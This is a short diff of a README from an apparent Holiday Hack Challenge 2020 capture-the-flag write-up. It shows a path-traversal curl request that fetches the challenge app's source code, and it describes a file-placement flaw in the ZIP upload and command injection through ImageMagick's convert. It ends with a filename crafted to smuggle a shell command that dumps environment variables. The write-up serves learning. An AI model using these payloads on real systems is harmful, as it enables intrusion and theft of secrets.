joergschwarzwaelder/hhc2020/Objective-8/README.md

 ```
 curl https://tag-generator.kringlecastle.com/image?id=../../app/lib/app.rb --output app.rb
 ```
-This code allows to place uploaded files in a chosen place on the remote system using the ZIP upload function.
+The application code allows to place uploaded files in a chosen place on the remote system using the ZIP upload function.
 Furthermore the application starts the `convert` tool from  ImageMagick which makes it possible to inject shell commands:
 ```
 jsw@io:*$ touch \'\`env\>joergen\`\;\'.jpg